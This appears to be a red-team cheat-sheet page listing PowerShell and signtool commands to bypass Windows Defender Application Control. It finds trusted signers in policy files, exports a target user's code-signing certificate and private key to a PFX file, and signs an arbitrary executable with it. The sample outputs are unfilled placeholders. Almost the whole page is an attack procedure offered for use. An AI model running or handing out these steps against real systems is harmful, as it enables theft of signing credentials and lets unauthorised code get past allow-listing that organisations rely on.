Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
1. Check WDAC Policies
# Look for '<Signers>' section in policies xml
ls C:\programdata\policies
Sample Output:
TO-DO2. Check Certificate
# In target signer session
Set-Location Cert:\CurrentUser\My
Sample Output:
TO-DO# List certificates
ls Cert:\CurrentUser\My
Sample Output:
TO-DO3. Export Certificate
# Create a passphrase
$pass = ConvertTo-SecureString -String "<PASSWORD>" -Force -AsPlainText
Sample Output:
TO-DO# Export certificate
Get-ChildItem -Path Cert:\CurrentUser\My\<THUMBPRINT> | Export-PfxCertificate -FilePath C:\Programdata\cert.pfx -Password $pass
Sample Output:
TO-DO4. Code Signing
.\signtool.exe sign /fd SHA256 /f "C:\Programdata\cert.pfx" /p "<PASSWORD>" "<EXE>"
Sample Output:
TO-DO5. Check
Get-AuthenticodeSignature "<EXE>"
Sample Output:
TO-DO